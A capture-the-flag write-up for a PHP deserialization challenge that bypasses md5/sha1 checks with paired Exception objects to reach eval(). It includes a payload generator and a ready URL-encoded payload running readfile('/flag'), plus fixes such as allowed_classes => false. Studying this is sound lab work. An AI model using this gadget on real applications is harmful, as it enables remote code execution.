
CDUTSEC (成理信安協會) challenge: Deserialization 02

A challenge that looks impossible on its face usually means there is a loophole to squeeze through.

Straight to the source###

<?php
show_source(__FILE__);
class CDUTSEC
{
    public $var1;
    public $var2;

    // Assigns to the local parameters, not $this->var1/$this->var2, so the
    // constructor never sets anything. It does not matter for the attack:
    // unserialize() never calls __construct; the properties come straight
    // from the payload.
    function __construct($var1, $var2)
    {
        $var1 = $var1;
        $var2 = $var2;
    }

    // Runs when the unserialized object is destroyed (end of script), so the
    // check and the eval() below operate on attacker-controlled property values.
    function __destruct()
    {
        echo md5($this->var1);
        echo md5($this->var2);
        if (($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2))) {
            eval($this->var1);
        }
    }
}

unserialize($_GET['payload']);

Code audit###

At first glance: nice, the two variables must differ under loose comparison (`!=`), yet their md5 and sha1 digests must be strictly equal (`===`). The first idea is the array bypass: md5() and sha1() cannot hash an array (on PHP 7 they return NULL with a warning, so NULL === NULL passes; on PHP 8 they throw a TypeError), but eval() needs a string, and an array converted to a string is just "Array", which is not valid code, so arrays are out. And because MD5 and SHA1 are checked together, a fastcoll collision pair will not help either: fastcoll only collides MD5, and the two files still have different SHA1 digests. So what now?
No secret sauce here; just bring out the expert's blog post:

Using the Exception class to bypass md5, sha1 and the like: https://mayi077.gitee.io/2020/08/14/%E5%88%A9%E7%94%A8-Exception%E7%B1%BB-%E7%BB%95%E8%BF%87md5-sha1-%E7%AD%89%E7%B3%BB%E5%88%97/
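Why that trick satisfies all three clauses is easier to see in a small harness. The script below is an added demonstration, not code from this write-up or from the linked post: it recreates the destructor's check as a function, builds the Exception pair, and shows the exact string that eval() receives. The command is a harmless `echo` stand-in for the real payload; the file name and line shown in the output are whatever your machine produces.

```php
<?php
// Added demonstration, not code from the original write-up or the linked post.
// It shows why a pair of Exception objects passes the CDUTSEC destructor check
// and what eval() actually receives. Needs PHP >= 7.0, no flag file, no network.

// The three clauses of the challenge's __destruct, reported individually.
function passesCheck($x, $y): bool
{
    $notEqual = ($x != $y);              // loose object comparison: property by property
    $md5Same  = (md5($x) === md5($y));   // md5()/sha1() coerce objects through __toString()
    $sha1Same = (sha1($x) === sha1($y));
    printf("  %-16s %s\n", 'var1 != var2:',  var_export($notEqual, true));
    printf("  %-16s %s\n", 'md5 identical:',  var_export($md5Same, true));
    printf("  %-16s %s\n", 'sha1 identical:', var_export($sha1Same, true));
    return $notEqual && $md5Same && $sha1Same;
}

// Harmless stand-in for readfile('/flag'). The trailing ?> matters: it drops
// eval() back into inline-HTML mode, so the rest of the Exception string
// (" in /path:line\nStack trace:...") is printed as text instead of parsed.
$cmd = "echo 'eval executed';?>";

// Both objects must be created on the SAME source line of the same file:
// Exception::__toString() embeds file and line but not the code, which is
// exactly why the strings (and hashes) match while the objects do not.
$a = new Exception($cmd); $b = new Exception($cmd, 1);

echo "Exception pair, same message, code 0 vs 1:\n";
$ok = passesCheck($a, $b);

// "Exception:" at the start of this string is parsed by eval() as a goto
// label, so the message becomes the first real statement.
echo "\nString that eval() sees:\n", (string) $a, "\n\n";

if ($ok) {
    echo "eval() output:\n";
    eval($a);        // object coerced to string, same as in the challenge
    echo "\n";
}
```

Running it prints `true` for all three clauses, then the `Exception: echo 'eval executed';?> in ...:line` string, and finally the echoed text followed by the stack-trace tail that `?>` turned into plain output. Change the second `new Exception` to its own line and the md5/sha1 clauses flip to `false`, because the embedded line number now differs.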

The script written from that post:###

<?php
// Local copy of the target class: only the property names matter to serialize().
// The methods are left out on purpose so that __destruct (and its eval) does not
// run on our own machine while generating the payload.
class CDUTSEC
{
    public $var1;
    public $var2;
}

// Command to run on the target. The trailing ?> is required: eval() receives the
// whole Exception::__toString() output, and ?> stops PHP from parsing the
// " in file:line / Stack trace" tail that follows the message.
$cmd = "readfile('/flag');?>";

// Same message, different code, and both created on the same line: __toString()
// includes file and line but not the code, so md5/sha1 match while $a != $b.
$a = new Exception($cmd); $b = new Exception($cmd, 1);

$tr = new CDUTSEC();
$tr->var1 = $a;
$tr->var2 = $b;
echo urlencode(serialize($tr));

The reason for urlencode is that the raw serialized string contains bytes that show up as garbage in a text editor: the protected properties of Exception are serialized with real null bytes in their names (`\0*\0message`, `\0Exception\0trace` and so on). URL-encoding once guarantees the payload we copy out is neither corrupted nor truncated. The file and line fields baked into the payload are simply those of the generating machine; they only need to be identical between the two objects.

Also, this challenge bans several of the usual flag-reading functions. The command we send is edited at $cmd; send 'phpinfo();?>' first, partly so that success is easy to recognise, and partly to see which of the common functions are disabled.

In the end we read the flag with readfile.

payload:O%3A7%3A%22CDUTSEC%22%3A2%3A%7Bs%3A4%3A%22var1%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7Ds%3A4%3A%22var2%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D%7D
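For the defensive side of the same bug, here is an added example (not from the write-up) of the two fixes a reviewer would ask for, checked against the same Exception-pair payload with a harmless command: the destructor rejects anything that is not a string before hashing, and, the fix that actually matters, unserialize() is called with `allowed_classes => false` so attacker input can never instantiate CDUTSEC or Exception in the first place. The class name is reused from the challenge; everything else is constructed for this demo.

```php
<?php
// Added example, not part of the original write-up: two fixes for the CDUTSEC
// pattern, exercised against the Exception-pair payload. Runs stand-alone.

class CDUTSEC
{
    public $var1;
    public $var2;

    function __destruct()
    {
        // Fix 1: the comparison only means anything for strings. Objects with
        // __toString (Exception), arrays and null all reach md5()/sha1() through
        // coercion or error paths, so refuse them before hashing anything.
        if (!is_string($this->var1) || !is_string($this->var2)) {
            echo "rejected: var1/var2 are not both strings\n";
            return;
        }
        if (($this->var1 != $this->var2)
            && (md5($this->var1) === md5($this->var2))
            && (sha1($this->var1) === sha1($this->var2))) {
            echo "would eval\n";   // eval() of attacker data deliberately left out
        } else {
            echo "check failed\n";
        }
    }
}

// Build the same payload the write-up uses, with a harmless command.
$cmd = "echo 'pwned';?>";
$a = new Exception($cmd); $b = new Exception($cmd, 1);
$tr = new CDUTSEC();
$tr->var1 = $a;
$tr->var2 = $b;
$payload = serialize($tr);   // $tr's own destructor fires at script end and is rejected too

// Fix 2: never let untrusted input choose classes. With allowed_classes => false
// every object in the payload becomes __PHP_Incomplete_Class, so no __destruct
// or __wakeup of CDUTSEC or Exception is ever reached.
$safe = unserialize($payload, ['allowed_classes' => false]);
echo get_class($safe), "\n";     // __PHP_Incomplete_Class
unset($safe);

// Without that option the object graph is rebuilt and __destruct runs on unset;
// with Fix 1 in place the Exception pair is now rejected instead of eval'ed.
$obj = unserialize($payload);
unset($obj);                     // rejected: var1/var2 are not both strings
```

Fix 1 alone still leaves unserialize() of user input as a gadget source for every other class in the application; Fix 2 is the one to apply in real code, and the data should be carried in JSON or a signed, versioned format rather than PHP serialization at all.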

Not much else to say; just a small trick picked up while grinding challenges. (laughs)